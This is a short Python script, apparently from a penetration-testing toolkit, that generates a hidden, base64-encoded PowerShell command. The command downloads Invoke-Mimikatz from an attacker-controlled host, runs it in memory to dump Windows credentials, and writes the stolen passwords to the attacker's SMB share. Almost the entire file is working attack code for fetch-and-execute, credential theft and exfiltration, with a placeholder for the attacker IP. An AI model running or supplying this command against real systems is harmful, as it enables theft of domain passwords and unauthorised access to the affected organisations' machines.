#!/usr/bin/env python # This download "Invoke-Mimikatz.ps1" from the attacker's webhost, # then execute the script in memory and pipe its output ot the attacker's SMB share # "\\loot$\passwords\". # # Formulated mainly from the following articles/tools # https://www.pentestgeek.com/2013/09/18/invoke-shellcode/ # http://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-passwords-with.html # http://www.harmj0y.net/blog/powershell/dumping-a-domains-worth-of-passwords-with-mimikatz-pt-2/ # https://github.com/trustedsec/unicorn # # TrustedSec import base64 attacker_ip = "<put your IP here>" # Main guts def main(): powershell_code = "IEX (New-Object Net.WebClient).DownloadString(\"http://" + attacker_ip + "/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1\");Invoke-Mimikatz -DumpCreds |Out-File -Encoding \"UTF8\" -FilePath \\\\" + attacker_ip + "\\loot$\\passwords\\$env:computername.txt" full_attack = "powershell -nop -win hidden -noni -enc " + base64.b64encode(powershell_code.encode('utf_16_le')) print full_attack # Standard boilerplate to call the main() function if __name__ == '__main__': main()